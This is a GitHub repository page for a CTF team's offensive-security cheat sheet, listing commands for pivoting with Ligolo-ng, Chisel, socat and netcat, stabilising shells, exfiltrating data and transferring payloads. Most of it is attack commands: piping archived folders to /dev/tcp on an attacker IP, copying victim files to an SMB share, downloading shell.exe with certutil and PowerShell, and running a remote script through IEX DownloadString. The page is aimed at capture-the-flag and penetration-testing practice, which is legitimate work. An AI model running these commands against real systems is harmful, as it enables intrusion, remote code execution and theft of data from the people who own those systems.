Skip to content
/ purplestorm-TTPs Public

A collection of commands, tools, techniques and procedures of the purplestorm ctf team.

7 stars 1 fork Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

purplestormctf/purplestorm-TTPs

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

45 Commits

zsh

zsh

 
 

CrackMapExec.md

CrackMapExec.md

 
 

README.md

README.md

 
 

SQL Injection.md

SQL Injection.md

 
 

Sliver.md

Sliver.md

 
 

Repository files navigation

purplestorm-TTPs

A collection of commands, tools, techniques and procedures of the purplestorm ctf team.

Table of Contents

Tooling

Swaks

swaks --server example.com --port 587 --auth-user "user@example.com" --auth-password "password" --to "user@target.com" --from ""user@example.com" --header "Subject: foobar" --body "\\\<LHOST>\x"

Ligolo-ng

Prepare Tunnel Interface

$ sudo ip tuntap add user $(whoami) mode tun ligolo
$ sudo ip link set ligolo up

Setup Proxy on Attacker Machine

$ ./proxy -laddr <LHOST>:443 -selfcert

Setup Agent on Target Machine

$ ./agent -connect <LHOST>:443 -ignore-cert

Configure Session

ligolo-ng » session
[Agent : user@target] » ifconfig
$ sudo ip r add 172.16.1.0/24 dev ligolo
[Agent : user@target] » start

Port Forwarding

[Agent : user@target] » listener_add --addr <RHOST>:<LPORT> --to <LHOST>:<LPORT> --tcp

Stabilizing Linux shell

script /dev/null -c bash
CTRL+Z
stty raw -echo; fg
reset
screen

Exfiltrating Data

Linux

via TCP socket, ebcdic and base64

On kali:

nc -nlvp 80 > datafolder.tmp

On target:

tar zcf - /tmp/datafolder | base64 | dd conv=ebcdic > /dev/tcp/10.10.10.10/80

On kali:

dd conv=ascii if=datafolder.tmp | base64 -d > datafolder.tar
tar xf datafolder.tar

via SSH

On target:

tar zcf - /tmp/datafolder | ssh root@<attacker_ip> "cd /tmp; tar zxpf -"

On kali:

cd /tmp/datafolder

Windows

via SMB server:

sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -username user -password pass share . -smb2support  # On kali
net use \\10.10.16.5\share /u:user pass   # On victim
copy C:\Users\user\Desktop\somefile.txt \\10.10.16.5\share\somefile.txt   # On victim

via pscp:

pscp Administrator@10.10.10.10:/Users/Administrator/Downloads/something.txt

Port forwarding

SSH:

On kali:

ssh -N -L 80:localhost:80 user@10.10.10.10 -C

Chisel:

./chisel server -p 8000 --reverse #Server -- Attacker
./chisel client 10.10.16.3:8000 R:100:172.17.0.1:100 #Client -- Victim

Socat:

On victim:

socat tcp-listen:8080,reuseaddr,fork tcp:localhost:9200 &

Netcat:

On victim:

nc -nlvp 8080 -c "nc localhost 1234"

Transfering files

Windows

cmd:

iwr -uri "http://10.10.10.10:8080/shell.exe" -outfile "shell.exe"

wget -O shell.exe 10.10.10.10:8000/shell.exe

certutil -urlcache -f  http://10.10.10.10:8000/shell.exe C:\inetpub\shell.exe

Powershell:

Invoke-WebRequest http://10.10.10.10:8000/shell.exe -OutFile shell.exe

powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.10.10:8000/shell.exe', 'shell.exe')"

powershell "IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10:8000/something.ps1')"

via SMB:

sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .    # On attacker

copy \\10.10.10.10\kali\reverse.exe C:\PrivEsc\reverse.exe    # On target

Linux

wget http://10.10.10.10:8000/some.sh

curl -o some.sh http://10.10.10.10:8000/some.sh

via base64:

cat shell.sh | base64 -w 0   # On attacker
echo <base64encoded> | base64 -d > shell.sh   # On target

via scp:

scp some.sh user@10.10.10.10:/tmp/some.sh   # On attacker

About

A collection of commands, tools, techniques and procedures of the purplestorm ctf team.

Topics

pentesting ctf offensive-security red-team ttp purplestorm

Resources

Readme
Activity

Stars

7 stars

Watchers

2 watching

Forks

1 fork
Report repository

Contributors 4

  •  
  •  
  •  
  •  

Languages